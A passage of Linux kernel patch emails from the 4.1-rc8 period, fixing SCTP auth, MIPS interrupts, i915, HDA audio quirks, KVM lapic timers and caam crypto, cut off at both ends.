Reported-by: Liu Wei Signed-off-by: Marcelo Ricardo Leitner Acked-by: Neil Horman Acked-by: Vlad Yasevich Signed-off-by: David S. Miller --- net/sctp/auth.c | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/net/sctp/auth.c b/net/sctp/auth.c index fb7976aee61c..4f15b7d730e1 100644 --- a/net/sctp/auth.c +++ b/net/sctp/auth.c @@ -381,13 +381,14 @@ int sctp_auth_asoc_copy_shkeys(const struct sctp_endpoint *ep, } -/* Public interface to creat the association shared key. +/* Public interface to create the association shared key. * See code above for the algorithm. */ int sctp_auth_asoc_init_active_key(struct sctp_association *asoc, gfp_t gfp) { struct sctp_auth_bytes *secret; struct sctp_shared_key *ep_key; + struct sctp_chunk *chunk; /* If we don't support AUTH, or peer is not capable * we don't need to do anything. @@ -410,6 +411,14 @@ int sctp_auth_asoc_init_active_key(struct sctp_association *asoc, gfp_t gfp) sctp_auth_key_put(asoc->asoc_shared_key); asoc->asoc_shared_key = secret; + /* Update send queue in case any chunk already in there now + * needs authenticating + */ + list_for_each_entry(chunk, &asoc->outqueue.out_chunk_list, list) { + if (sctp_auth_send_cid(chunk->chunk_hdr->type, asoc)) + chunk->auth = 1; + } + return 0; } From b07d496177cd3bc4b70fb8a5e85ede24cb403a11 Mon Sep 17 00:00:00 2001 From: Masanari Iida Date: Sat, 13 Jun 2015 00:23:21 +0900 Subject: [PATCH 843/872] Doc: networking: Fix URL for wiki.wireshark.org in udplite.txt This patch fix URL (http to https) for wiki.wireshark.org. Signed-off-by: Masanari Iida Signed-off-by: David S. Miller --- Documentation/networking/udplite.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Documentation/networking/udplite.txt b/Documentation/networking/udplite.txt index d727a3829100..53a726855e49 100644 --- a/Documentation/networking/udplite.txt +++ b/Documentation/networking/udplite.txt @@ -20,7 +20,7 @@ files/UDP-Lite-HOWTO.txt o The Wireshark UDP-Lite WiKi (with capture files): - http://wiki.wireshark.org/Lightweight_User_Datagram_Protocol + https://wiki.wireshark.org/Lightweight_User_Datagram_Protocol o The Protocol Spec, RFC 3828, http://www.ietf.org/rfc/rfc3828.txt From 1b3ed367ce11fb39a345d807ef4168f727236083 Mon Sep 17 00:00:00 2001 From: Rabin Vincent Date: Fri, 12 Jun 2015 10:01:56 +0200 Subject: [PATCH 844/872] IRQCHIP: mips-gic: Don't nest calls to do_IRQ() The GIC chained handlers use do_IRQ() to call the subhandlers. This means that irq_enter() calls get nested, which leads to preempt count looking like we're in nested interrupts, which in turn leads to all system time being accounted as IRQ time in account_system_time(). Fix it by using generic_handle_irq(). Since these same functions are used in some systems (if cpu_has_veic) from a low-level vectored interrupt handler which does not go throught do_IRQ(), we need to do it conditionally. Signed-off-by: Rabin Vincent Reviewed-by: Andrew Bresticker Acked-by: Thomas Gleixner Cc: linux-mips@linux-mips.org Cc: tglx@linutronix.de Cc: jason@lakedaemon.net Patchwork: https://patchwork.linux-mips.org/patch/10545/ Signed-off-by: Ralf Baechle --- drivers/irqchip/irq-mips-gic.c | 21 ++++++++++++++------- 1 file changed, 14 insertions(+), 7 deletions(-) diff --git a/drivers/irqchip/irq-mips-gic.c b/drivers/irqchip/irq-mips-gic.c index 57f09cb54464..269c2354c431 100644 --- a/drivers/irqchip/irq-mips-gic.c +++ b/drivers/irqchip/irq-mips-gic.c @@ -271,7 +271,7 @@ int gic_get_c0_fdc_int(void) GIC_LOCAL_TO_HWIRQ(GIC_LOCAL_INT_FDC)); } -static void gic_handle_shared_int(void) +static void gic_handle_shared_int(bool chained) { unsigned int i, intr, virq; unsigned long *pcpu_mask; @@ -299,7 +299,10 @@ static void gic_handle_shared_int(void) while (intr != gic_shared_intrs) { virq = irq_linear_revmap(gic_irq_domain, GIC_SHARED_TO_HWIRQ(intr)); - do_IRQ(virq); + if (chained) + generic_handle_irq(virq); + else + do_IRQ(virq); /* go to next pending bit */ bitmap_clear(pending, intr, 1); @@ -431,7 +434,7 @@ static struct irq_chip gic_edge_irq_controller = { #endif }; -static void gic_handle_local_int(void) +static void gic_handle_local_int(bool chained) { unsigned long pending, masked; unsigned int intr, virq; @@ -445,7 +448,10 @@ static void gic_handle_local_int(void) while (intr != GIC_NUM_LOCAL_INTRS) { virq = irq_linear_revmap(gic_irq_domain, GIC_LOCAL_TO_HWIRQ(intr)); - do_IRQ(virq); + if (chained) + generic_handle_irq(virq); + else + do_IRQ(virq); /* go to next pending bit */ bitmap_clear(&pending, intr, 1); @@ -509,13 +515,14 @@ static struct irq_chip gic_all_vpes_local_irq_controller = { static void __gic_irq_dispatch(void) { - gic_handle_local_int(); - gic_handle_shared_int(); + gic_handle_local_int(false); + gic_handle_shared_int(false); } static void gic_irq_dispatch(unsigned int irq, struct irq_desc *desc) { - __gic_irq_dispatch(); + gic_handle_local_int(true); + gic_handle_shared_int(true); } #ifdef CONFIG_MIPS_GIC_IPI From 36f58113423f4588d7cf7535644fbb214414193b Mon Sep 17 00:00:00 2001 From: Jaedon Shin Date: Fri, 12 Jun 2015 18:04:14 +0900 Subject: [PATCH 845/872] MPI: MIPS: Fix compilation error with GCC 5.1 This patch fixes mips compilation error: lib/mpi/generic_mpih-mul1.c: In function 'mpihelp_mul_1': lib/mpi/longlong.h:651:2: error: impossible constraint in 'asm' Signed-off-by: Jaedon Shin Cc: Linux-MIPS Patchwork: https://patchwork.linux-mips.org/patch/10546/ Signed-off-by: Ralf Baechle --- lib/mpi/longlong.h | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/mpi/longlong.h b/lib/mpi/longlong.h index aac511417ad1..a89d041592c8 100644 --- a/lib/mpi/longlong.h +++ b/lib/mpi/longlong.h @@ -639,7 +639,7 @@ do { \ ************** MIPS ***************** ***************************************/ #if defined(__mips__) && W_TYPE_SIZE == 32 -#if __GNUC__ >= 4 && __GNUC_MINOR__ >= 4 +#if (__GNUC__ >= 5) || (__GNUC__ >= 4 && __GNUC_MINOR__ >= 4) #define umul_ppmm(w1, w0, u, v) \ do { \ UDItype __ll = (UDItype)(u) * (v); \ @@ -671,7 +671,7 @@ do { \ ************** MIPS/64 ************** ***************************************/ #if (defined(__mips) && __mips >= 3) && W_TYPE_SIZE == 64 -#if __GNUC__ >= 4 && __GNUC_MINOR__ >= 4 +#if (__GNUC__ >= 5) || (__GNUC__ >= 4 && __GNUC_MINOR__ >= 4) #define umul_ppmm(w1, w0, u, v) \ do { \ typedef unsigned int __ll_UTItype __attribute__((mode(TI))); \ From acbf6ed1ca5d6408d85290d5d2a6ac4a2069e735 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Sun, 14 Jun 2015 18:51:20 +0900 Subject: [PATCH 846/872] lib: fix __ktime_divns() to latest update Signed-off-by: Hajime Tazaki --- arch/lib/time.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/arch/lib/time.c b/arch/lib/time.c index b54be754f532..7129660e66b2 100644 --- a/arch/lib/time.c +++ b/arch/lib/time.c @@ -71,21 +71,23 @@ ktime_t ktime_get_with_offset(enum tk_offsets offs) /* * Divide a ktime value by a nanosecond value */ -u64 __ktime_divns(const ktime_t kt, s64 div) +s64 __ktime_divns(const ktime_t kt, s64 div) { - u64 dclc; int sft = 0; + s64 dclc; + u64 tmp; dclc = ktime_to_ns(kt); + tmp = dclc < 0 ? -dclc : dclc; + /* Make sure the divisor is less than 2^32: */ while (div >> 32) { sft++; div >>= 1; } - dclc >>= sft; - do_div(dclc, (unsigned long)div); - - return dclc; + tmp >>= sft; + do_div(tmp, (unsigned long) div); + return dclc < 0 ? -tmp : tmp; } #endif /* BITS_PER_LONG >= 64 */ From 0f57d86787d8b1076ea8f9cbdddda2a46d534a27 Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 14 Jun 2015 15:51:10 -1000 Subject: [PATCH 847/872] Linux 4.1-rc8 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 40a8b068ac26..3ba504496cb2 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc7 +EXTRAVERSION = -rc8 NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From 016a65a39170c3cdca09a6ac343ff4f124668b45 Mon Sep 17 00:00:00 2001 From: Chris Wilson Date: Thu, 11 Jun 2015 08:06:08 +0100 Subject: [PATCH 848/872] drm/i915: Always reset vma->ggtt_view.pages cache on unbinding With the introduction of multiple views of an obj in the same vm, each vma was taught to cache its copy of the pages (so that different views could have different page arrangements). However, this missed decoupling those vma->ggtt_view.pages when the vma released its reference on the obj->pages. As we don't always free the vma, this leads to a possible scenario (e.g. execbuffer interrupted by the shrinker) where the vma points to a stale obj->pages, and explodes. Fixes regression from commit fe14d5f4e5468c5b80a24f1a64abcbe116143670 Author: Tvrtko Ursulin Date: Wed Dec 10 17:27:58 2014 +0000 drm/i915: Infrastructure for supporting different GGTT views per object Tvrtko says, if someone else will be confused how this can happen, key is the reservation execbuffer path. That puts the VMA on the exec_list which prevents i915_vma_unbind and i915_gem_vma_destroy from fully destroying the VMA. So the VMA is left existing as an empty object in the list - unbound and disassociated with the backing store. Kind of a cached memory object. And then re-using it needs to clear the cached pages pointer which is fixed above. Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1227892 Signed-off-by: Chris Wilson Cc: Tvrtko Ursulin Cc: Daniel Vetter Cc: Michel Thierry Cc: stable@vger.kernel.org Reviewed-by: Tvrtko Ursulin [Jani: Added Tvrtko's explanation to commit message.] Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/i915_gem.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/i915/i915_gem.c b/drivers/gpu/drm/i915/i915_gem.c index 851b585987f9..c3806c66650a 100644 --- a/drivers/gpu/drm/i915/i915_gem.c +++ b/drivers/gpu/drm/i915/i915_gem.c @@ -3000,8 +3000,8 @@ int i915_vma_unbind(struct i915_vma *vma) } else if (vma->ggtt_view.pages) { sg_free_table(vma->ggtt_view.pages); kfree(vma->ggtt_view.pages); - vma->ggtt_view.pages = NULL; } + vma->ggtt_view.pages = NULL; } drm_mm_remove_node(&vma->node); From 6ab42ff44864d26e8e498b8ac655d24ee389d267 Mon Sep 17 00:00:00 2001 From: Hui Wang Date: Mon, 15 Jun 2015 17:43:39 +0800 Subject: [PATCH 849/872] ALSA: hda - adding a DAC/pin preference map for a HP Envy TS machine On a HP Envy TouchSmart laptop, there are 2 speakers (main speaker and subwoofer speaker), 1 headphone and 2 DACs, without this fixup, the headphone will be assigned to a DAC and the 2 speakers will be assigned to another DAC, this assignment makes the surround-2.1 channels invalid. To fix it, here using a DAC/pin preference map to bind the main speaker to 1 DAC and the subwoofer speaker will be assigned to another DAC. Cc: Signed-off-by: Hui Wang Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_sigmatel.c | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c index 6833c74ed6ff..6c66d7e16439 100644 --- a/sound/pci/hda/patch_sigmatel.c +++ b/sound/pci/hda/patch_sigmatel.c @@ -100,6 +100,7 @@ enum { STAC_HP_ENVY_BASS, STAC_HP_BNB13_EQ, STAC_HP_ENVY_TS_BASS, + STAC_HP_ENVY_TS_DAC_BIND, STAC_92HD83XXX_GPIO10_EAPD, STAC_92HD83XXX_MODELS }; @@ -2171,6 +2172,22 @@ static void stac92hd83xxx_fixup_gpio10_eapd(struct hda_codec *codec, spec->eapd_switch = 0; } +static void hp_envy_ts_fixup_dac_bind(struct hda_codec *codec, + const struct hda_fixup *fix, + int action) +{ + struct sigmatel_spec *spec = codec->spec; + static hda_nid_t preferred_pairs[] = { + 0xd, 0x13, + 0 + }; + + if (action != HDA_FIXUP_ACT_PRE_PROBE) + return; + + spec->gen.preferred_dacs = preferred_pairs; +} + static const struct hda_verb hp_bnb13_eq_verbs[] = { /* 44.1KHz base */ { 0x22, 0x7A6, 0x3E }, @@ -2686,6 +2703,12 @@ static const struct hda_fixup stac92hd83xxx_fixups[] = { {} }, }, + [STAC_HP_ENVY_TS_DAC_BIND] = { + .type = HDA_FIXUP_FUNC, + .v.func = hp_envy_ts_fixup_dac_bind, + .chained = true, + .chain_id = STAC_HP_ENVY_TS_BASS, + }, [STAC_92HD83XXX_GPIO10_EAPD] = { .type = HDA_FIXUP_FUNC, .v.func = stac92hd83xxx_fixup_gpio10_eapd, @@ -2764,6 +2787,8 @@ static const struct snd_pci_quirk stac92hd83xxx_fixup_tbl[] = { "HP bNB13", STAC_HP_BNB13_EQ), SND_PCI_QUIRK(PCI_VENDOR_ID_HP, 0x190e, "HP ENVY TS", STAC_HP_ENVY_TS_BASS), + SND_PCI_QUIRK(PCI_VENDOR_ID_HP, 0x1967, + "HP ENVY TS", STAC_HP_ENVY_TS_DAC_BIND), SND_PCI_QUIRK(PCI_VENDOR_ID_HP, 0x1940, "HP bNB13", STAC_HP_BNB13_EQ), SND_PCI_QUIRK(PCI_VENDOR_ID_HP, 0x1941, From 8b99aba70c5f581860736855e211cf981f438ad2 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Mon, 15 Jun 2015 11:59:32 +0200 Subject: [PATCH 850/872] ALSA: hda - Fix audio crackles on Dell Latitude E7x40 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit We still got a report that the audio crackles and noises occur with the recent 4.1 kernels on Dell machines. These machines seem to need similar workarounds that have been applied to the recent Dell XPS 13 models. Since the codec of these machines (Dell Latitute E7240 and E7440) is different from XPS 13's one, we need a new fixup entry. Also, it was confirmed that the previous workaround to disable the widget power-save (commit [219f47e4f964: ALSA: hda - Disable widget power-saving for ALC292 & co]) is no longer needed after this fix. So, this patch includes the partial revert of the commit, too. Reported-and-tested-by: Mihai Donțu Tested-by: Jonathan McDowell Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 0320cb523d9e..919051d92a0b 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -4515,6 +4515,8 @@ enum { ALC288_FIXUP_DELL_HEADSET_MODE, ALC288_FIXUP_DELL1_MIC_NO_PRESENCE, ALC288_FIXUP_DELL_XPS_13_GPIO6, + ALC292_FIXUP_DELL_E7X, + ALC292_FIXUP_DISABLE_AAMIX, }; static const struct hda_fixup alc269_fixups[] = { @@ -5037,6 +5039,16 @@ static const struct hda_fixup alc269_fixups[] = { .chained = true, .chain_id = ALC288_FIXUP_DELL1_MIC_NO_PRESENCE }, + [ALC292_FIXUP_DISABLE_AAMIX] = { + .type = HDA_FIXUP_FUNC, + .v.func = alc_fixup_disable_aamix, + }, + [ALC292_FIXUP_DELL_E7X] = { + .type = HDA_FIXUP_FUNC, + .v.func = alc_fixup_dell_xps13, + .chained = true, + .chain_id = ALC292_FIXUP_DISABLE_AAMIX + }, }; static const struct snd_pci_quirk alc269_fixup_tbl[] = { @@ -5049,6 +5061,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = { SND_PCI_QUIRK(0x1025, 0x0775, "Acer Aspire E1-572", ALC271_FIXUP_HP_GATE_MIC_JACK_E1_572), SND_PCI_QUIRK(0x1025, 0x079b, "Acer Aspire V5-573G", ALC282_FIXUP_ASPIRE_V5_PINS), SND_PCI_QUIRK(0x1028, 0x0470, "Dell M101z", ALC269_FIXUP_DELL_M101Z), + SND_PCI_QUIRK(0x1028, 0x05ca, "Dell Latitude E7240", ALC292_FIXUP_DELL_E7X), + SND_PCI_QUIRK(0x1028, 0x05cb, "Dell Latitude E7440", ALC292_FIXUP_DELL_E7X), SND_PCI_QUIRK(0x1028, 0x05da, "Dell Vostro 5460", ALC290_FIXUP_SUBWOOFER), SND_PCI_QUIRK(0x1028, 0x05f4, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE), SND_PCI_QUIRK(0x1028, 0x05f5, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE), @@ -5637,8 +5651,7 @@ static int patch_alc269(struct hda_codec *codec) spec = codec->spec; spec->gen.shared_mic_vref_pin = 0x18; - if (codec->core.vendor_id != 0x10ec0292) - codec->power_save_node = 1; + codec->power_save_node = 1; snd_hda_pick_fixup(codec, alc269_fixup_models, alc269_fixup_tbl, alc269_fixups); From 0f252a3541b1051f600ca6a26ba9d8c67b4dd063 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Sun, 14 Jun 2015 19:16:59 +0200 Subject: [PATCH 851/872] ALSA: mips: let SND_SGI_O2 select SND_PCM Fix the missing dependency on PCM stuff. [Add the same fix for HAL2, too -- tiwai] Signed-off-by: Nicholas Mc Guire Signed-off-by: Takashi Iwai --- sound/mips/Kconfig | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sound/mips/Kconfig b/sound/mips/Kconfig index d2f615ab177a..2153d31fb663 100644 --- a/sound/mips/Kconfig +++ b/sound/mips/Kconfig @@ -12,12 +12,14 @@ if SND_MIPS config SND_SGI_O2 tristate "SGI O2 Audio" depends on SGI_IP32 + select SND_PCM help Sound support for the SGI O2 Workstation. config SND_SGI_HAL2 tristate "SGI HAL2 Audio" depends on SGI_HAS_HAL2 + select SND_PCM help Sound support for the SGI Indy and Indigo2 Workstation. From 245ec9d85696c3e539b23e210f248698b478379c Mon Sep 17 00:00:00 2001 From: Jani Nikula Date: Mon, 15 Jun 2015 12:59:37 +0300 Subject: [PATCH 852/872] Revert "drm/i915: Don't skip request retirement if the active list is empty" MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This reverts commit 0aedb1626566efd72b369c01992ee7413c82a0c5. I messed things up while applying [1] to drm-intel-fixes. Rectify. [1] http://mid.gmane.org/1432827156-9605-1-git-send-email-ville.syrjala@linux.intel.com Fixes: 0aedb1626566 ("drm/i915: Don't skip request retirement if the active list is empty") Cc: stable@vger.kernel.org Acked-by: Ville Syrjälä Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/i915_gem.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/gpu/drm/i915/i915_gem.c b/drivers/gpu/drm/i915/i915_gem.c index c3806c66650a..2d0995e7afc3 100644 --- a/drivers/gpu/drm/i915/i915_gem.c +++ b/drivers/gpu/drm/i915/i915_gem.c @@ -2656,6 +2656,9 @@ void i915_gem_reset(struct drm_device *dev) void i915_gem_retire_requests_ring(struct intel_engine_cs *ring) { + if (list_empty(&ring->request_list)) + return; + WARN_ON(i915_verify_lists(ring->dev)); /* Retire requests first as we use it above for the early return. From 82d6d8a4034a7480d582791763c89c328c2a8f0c Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Mon, 15 Jun 2015 20:36:12 +0200 Subject: [PATCH 853/872] ALSA: hda - Fix noisy outputs on Dell XPS13 (2015 model) The new Dell XPS13 also requires the similar quirk for fixing the noisy outputs. (But, as the codec was changed, now the fixup for Latitude is used instead.) Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=99851 Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 919051d92a0b..6d010452c1f5 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -5072,6 +5072,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = { SND_PCI_QUIRK(0x1028, 0x0638, "Dell Inspiron 5439", ALC290_FIXUP_MONO_SPEAKERS_HSJACK), SND_PCI_QUIRK(0x1028, 0x064a, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE), SND_PCI_QUIRK(0x1028, 0x064b, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE), + SND_PCI_QUIRK(0x1028, 0x0665, "Dell XPS 13", ALC292_FIXUP_DELL_E7X), SND_PCI_QUIRK(0x1028, 0x06c7, "Dell", ALC255_FIXUP_DELL1_MIC_NO_PRESENCE), SND_PCI_QUIRK(0x1028, 0x06d9, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE), SND_PCI_QUIRK(0x1028, 0x06da, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE), From 25161084b1c1b0c29948f6f77266a35f302196b7 Mon Sep 17 00:00:00 2001 From: Adam Jackson Date: Mon, 15 Jun 2015 16:16:15 -0400 Subject: [PATCH 854/872] drm/mgag200: Reject non-character-cell-aligned mode widths Turns out 1366x768 does not in fact work on this hardware. Signed-off-by: Adam Jackson Cc: stable@vger.kernel.org Signed-off-by: Dave Airlie --- drivers/gpu/drm/mgag200/mgag200_mode.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/gpu/drm/mgag200/mgag200_mode.c b/drivers/gpu/drm/mgag200/mgag200_mode.c index 6e84df9369a6..ad4b9010dfb0 100644 --- a/drivers/gpu/drm/mgag200/mgag200_mode.c +++ b/drivers/gpu/drm/mgag200/mgag200_mode.c @@ -1526,6 +1526,11 @@ static int mga_vga_mode_valid(struct drm_connector *connector, return MODE_BANDWIDTH; } + if ((mode->hdisplay % 8) != 0 || (mode->hsync_start % 8) != 0 || + (mode->hsync_end % 8) != 0 || (mode->htotal % 8) != 0) { + return MODE_H_ILLEGAL; + } + if (mode->crtc_hdisplay > 2048 || mode->crtc_hsync_start > 4096 || mode->crtc_hsync_end > 4096 || mode->crtc_htotal > 4096 || mode->crtc_vdisplay > 2048 || mode->crtc_vsync_start > 4096 || From b6ac069532218027f2991cba01d7a72a200688b0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Radim=20Kr=C4=8Dm=C3=A1=C5=99?= Date: Fri, 5 Jun 2015 20:57:41 +0200 Subject: [PATCH 855/872] KVM: x86: fix lapic.timer_mode on restore MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit lapic.timer_mode was not properly initialized after migration, which broke few useful things, like login, by making every sleep eternal. Fix this by calling apic_update_lvtt in kvm_apic_post_state_restore. There are other slowpaths that update lvtt, so this patch makes sure something similar doesn't happen again by calling apic_update_lvtt after every modification. Cc: stable@vger.kernel.org Fixes: f30ebc312ca9 ("KVM: x86: optimize some accesses to LVTT and SPIV") Signed-off-by: Radim Krčmář Signed-off-by: Marcelo Tosatti --- arch/x86/kvm/lapic.c | 26 ++++++++++++++++---------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c index 629af0f1c5c4..4c7deb4f78a1 100644 --- a/arch/x86/kvm/lapic.c +++ b/arch/x86/kvm/lapic.c @@ -1090,6 +1090,17 @@ static void update_divide_count(struct kvm_lapic *apic) apic->divide_count); } +static void apic_update_lvtt(struct kvm_lapic *apic) +{ + u32 timer_mode = kvm_apic_get_reg(apic, APIC_LVTT) & + apic->lapic_timer.timer_mode_mask; + + if (apic->lapic_timer.timer_mode != timer_mode) { + apic->lapic_timer.timer_mode = timer_mode; + hrtimer_cancel(&apic->lapic_timer.timer); + } +} + static void apic_timer_expired(struct kvm_lapic *apic) { struct kvm_vcpu *vcpu = apic->vcpu; @@ -1298,6 +1309,7 @@ static int apic_reg_write(struct kvm_lapic *apic, u32 reg, u32 val) apic_set_reg(apic, APIC_LVTT + 0x10 * i, lvt_val | APIC_LVT_MASKED); } + apic_update_lvtt(apic); atomic_set(&apic->lapic_timer.pending, 0); } @@ -1330,20 +1342,13 @@ static int apic_reg_write(struct kvm_lapic *apic, u32 reg, u32 val) break; - case APIC_LVTT: { - u32 timer_mode = val & apic->lapic_timer.timer_mode_mask; - - if (apic->lapic_timer.timer_mode != timer_mode) { - apic->lapic_timer.timer_mode = timer_mode; - hrtimer_cancel(&apic->lapic_timer.timer); - } - + case APIC_LVTT: if (!kvm_apic_sw_enabled(apic)) val |= APIC_LVT_MASKED; val &= (apic_lvt_mask[0] | apic->lapic_timer.timer_mode_mask); apic_set_reg(apic, APIC_LVTT, val); + apic_update_lvtt(apic); break; - } case APIC_TMICT: if (apic_lvtt_tscdeadline(apic)) @@ -1576,7 +1581,7 @@ void kvm_lapic_reset(struct kvm_vcpu *vcpu) for (i = 0; i < APIC_LVT_NUM; i++) apic_set_reg(apic, APIC_LVTT + 0x10 * i, APIC_LVT_MASKED); - apic->lapic_timer.timer_mode = 0; + apic_update_lvtt(apic); apic_set_reg(apic, APIC_LVT0, SET_APIC_DELIVERY_MODE(0, APIC_MODE_EXTINT)); @@ -1802,6 +1807,7 @@ void kvm_apic_post_state_restore(struct kvm_vcpu *vcpu, apic_update_ppr(apic); hrtimer_cancel(&apic->lapic_timer.timer); + apic_update_lvtt(apic); update_divide_count(apic); start_apic_timer(apic); apic->irr_pending = true; From 6fd4b15603124c1b56e03db29b41ec39d8a077b9 Mon Sep 17 00:00:00 2001 From: Steve Cornelius Date: Mon, 15 Jun 2015 16:52:56 -0700 Subject: [PATCH 856/872] crypto: caam - improve initalization for context state saves Multiple function in asynchronous hashing use a saved-state block, a.k.a. struct caam_hash_state, which holds a stash of information between requests (init/update/final). Certain values in this state block are loaded for processing using an inline-if, and when this is done, the potential for uninitialized data can pose conflicts. Therefore, this patch improves initialization of state data to prevent false assignments using uninitialized data in the state block. This patch addresses the following traceback, originating in ahash_final_ctx(), although a problem like this could certainly exhibit other symptoms: kernel BUG at arch/arm/mm/dma-mapping.c:465! Unable to handle kernel NULL pointer dereference at virtual address 00000000 pgd = 80004000 [00000000] *pgd=00000000 Internal error: Oops: 805 [#1] PREEMPT SMP Modules linked in: CPU: 0 Not tainted (3.0.15-01752-gdd441b9-dirty #40) PC is at __bug+0x1c/0x28 LR is at __bug+0x18/0x28 pc : [<80043240>] lr : [<8004323c>] psr: 60000013 sp : e423fd98 ip : 60000013 fp : 0000001c r10: e4191b84 r9 : 00000020 r8 : 00000009 r7 : 88005038 r6 : 00000001 r5 : 2d676572 r4 : e4191a60 r3 : 00000000 r2 : 00000001 r1 : 60000093 r0 : 00000033 Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel Control: 10c53c7d Table: 1000404a DAC: 00000015 Process cryptomgr_test (pid: 1306, stack limit = 0xe423e2f0) Stack: (0xe423fd98 to 0xe4240000) fd80: 11807fd1 80048544 fda0: 88005000 e4191a00 e5178040 8039dda0 00000000 00000014 2d676572 e4191008 fdc0: 88005018 e4191a60 00100100 e4191a00 00000000 8039ce0c e423fea8 00000007 fde0: e4191a00 e4227000 e5178000 8039ce18 e419183c 80203808 80a94a44 00000006 fe00: 00000000 80207180 00000000 00000006 e423ff08 00000000 00000007 e5178000 fe20: e41918a4 80a949b4 8c4844e2 00000000 00000049 74227000 8c4844e2 00000e90 fe40: 0000000e 74227e90 ffff8c58 80ac29e0 e423fed4 8006a350 8c81625c e423ff5c fe60: 00008576 e4002500 00000003 00030010 e4002500 00000003 e5180000 e4002500 fe80: e5178000 800e6d24 007fffff 00000000 00000010 e4001280 e4002500 60000013 fea0: 000000d0 804df078 00000000 00000000 00000000 00000000 00000000 00000000 fec0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 fee0: 00000000 00000000 e4227000 e4226000 e4753000 e4752000 e40a5000 e40a4000 ff00: e41e7000 e41e6000 00000000 00000000 00000000 e423ff14 e423ff14 00000000 ff20: 00000400 804f9080 e5178000 e4db0b40 00000000 e4db0b80 0000047c 00000400 ff40: 00000000 8020758c 00000400 ffffffff 0000008a 00000000 e4db0b40 80206e00 ff60: e4049dbc 00000000 00000000 00000003 e423ffa4 80062978 e41a8bfc 00000000 ff80: 00000000 e4049db4 00000013 e4049db0 00000013 00000000 00000000 00000000 ffa0: e4db0b40 e4db0b40 80204cbc 00000013 00000000 00000000 00000000 80204cfc ffc0: e4049da0 80089544 80040a40 00000000 e4db0b40 00000000 00000000 00000000 ffe0: e423ffe0 e423ffe0 e4049da0 800894c4 80040a40 80040a40 00000000 00000000 [<80043240>] (__bug+0x1c/0x28) from [<80048544>] (___dma_single_dev_to_cpu+0x84) [<80048544>] (___dma_single_dev_to_cpu+0x84/0x94) from [<8039dda0>] (ahash_fina) [<8039dda0>] (ahash_final_ctx+0x180/0x428) from [<8039ce18>] (ahash_final+0xc/0) [<8039ce18>] (ahash_final+0xc/0x10) from [<80203808>] (crypto_ahash_op+0x28/0xc) [<80203808>] (crypto_ahash_op+0x28/0xc0) from [<80207180>] (test_hash+0x214/0x5) [<80207180>] (test_hash+0x214/0x5b8) from [<8020758c>] (alg_test_hash+0x68/0x8c) [<8020758c>] (alg_test_hash+0x68/0x8c) from [<80206e00>] (alg_test+0x7c/0x1b8) [<80206e00>] (alg_test+0x7c/0x1b8) from [<80204cfc>] (cryptomgr_test+0x40/0x48) [<80204cfc>] (cryptomgr_test+0x40/0x48) from [<80089544>] (kthread+0x80/0x88) [<80089544>] (kthread+0x80/0x88) from [<80040a40>] (kernel_thread_exit+0x0/0x8) Code: e59f0010 e1a01003 eb126a8d e3a03000 (e5833000) ---[ end trace d52a403a1d1eaa86 ]--- Cc: stable@vger.kernel.org Signed-off-by: Steve Cornelius Signed-off-by: Victoria Milhoan Signed-off-by: Herbert Xu --- drivers/crypto/caam/caamhash.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/crypto/caam/caamhash.c b/drivers/crypto/caam/caamhash.c index 